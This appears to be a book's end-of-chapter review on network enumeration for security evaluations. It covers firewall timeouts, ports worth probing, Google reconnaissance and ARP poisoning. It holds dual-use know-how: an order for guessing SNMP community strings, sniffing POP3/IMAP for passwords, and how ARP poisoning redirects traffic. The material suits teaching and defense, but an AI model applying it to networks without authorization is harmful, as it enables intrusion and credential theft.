Q: How does a firewall (both host-based and network) affect the time required to run tools that perform network enumeration?
A: When a firewall is configured to reject unauthorized packets, the sending host receives a “connection refused” message. When a firewall drops the unauthorized packet without sending the connection refused message, the sending system must wait a minimum time before determining that the connection will not succeed. On many operating systems and in many applications, the number of retries and length of the timeout can be configured. The longer the timeout and the higher the retry count, the longer it takes to determine whether a service is responding.
Q: What are the common SNMP community strings? What other strings might you try?
A: Public and Private are the two most common community strings. Next try the company’s name. Next are the corporate initials. Then, along with the corporate initials, try adding RO (read-only) and RW (read-write) to the front and back.
Q: For the following ports, what is the common service and why should you care about this?
1433
A: This is the port for Microsoft SQL Server. A number of worms have used MS-SQL as their attack vector. Many MS-SQL installations have configuration vulnerabilities. You should never be allowed to connect directly to a database server from the external untrusted network.
110
A: POP3 runs on 110. This is an unencrypted protocol for downloading e-mail. On many systems, the password for e-mail is the same as account sign-on. When you’re network sniffing, both POP3 and IMAP are prime protocols to watch for to learn username/password pairs.
6667
A: Internet Relay Chat (IRC). Most botnets use IRC to communicate. All outbound connections to IRC should be blocked by default. If a business need exists, open connections only to individual IRC servers that are known to be safe.
5631
A: PC Anywhere is used by many organizations for remote administration. Many PC Anywhere installations are not configured with strong authentication. Most are not configured with encrypted connections, allowing for easy sniffing of all activity.
Q: When doing a security evaluation, how many automated tools should you use and why?
A: You should use at least one tool but preferably two or more. Using at least one automated tool increases the consistency and reliability of the work. No one tool can do it all. By using more than one tool, you lessen the number of false positives and false negatives.
Q: BiDiBLAH uses Google to gather information. Why use Google?
A: Many companies do not understand the completeness with which Google caches the Internet. Combine Google with the Wayback Machine (www.archive.org/web/web.php) and you can learn a lot about a company. By searching for e-mail addresses, you learn who key individuals are, along with, possibly, sub-domains. By searching Internet newsgroups, you may be able to determine what language and IDE the target is using to develop its primary application. Sometimes Google will even find code snippets from the application.
Q: How does ARP poisoning work?
A: Systems do not communicate directly with IP; they use the MAC address. When systemA is about to start a new connection to systemB, it must find systemB’s MAC address. SystemA will broadcast an ARP request to the network. This request asks, “Who has IP Address B?” Normally, configured machines answer only when it is their IP address. In ARP poisoning, you respond to all ARP requests by saying that you are systemB when you are really systemH. Your machine will usually also constantly broadcast for all IP address on the network. This broadcast is normally picked up by all systems, and they fill their local ARP table with your MAC for all IPs.
Q: How accurate is banner grabbing for enumerating what application and version is running on a remote system?
A: You cannot rely on banner grabbing. Most applications can be configured to lie within their banner. Also, most applications can be configured to run on different ports than normal.
Q: Why will Port Security not stop ARP poisoning?
A: Port Security limits only the number of MAC addresses per port. When ARP poisoning, you are not sending multiple MAC addresses. You are sending multiple IP addresses and associating them with your one MAC address. If you can limit the number of IP addresses per port, you can severely limit the scope of ARP poisoning.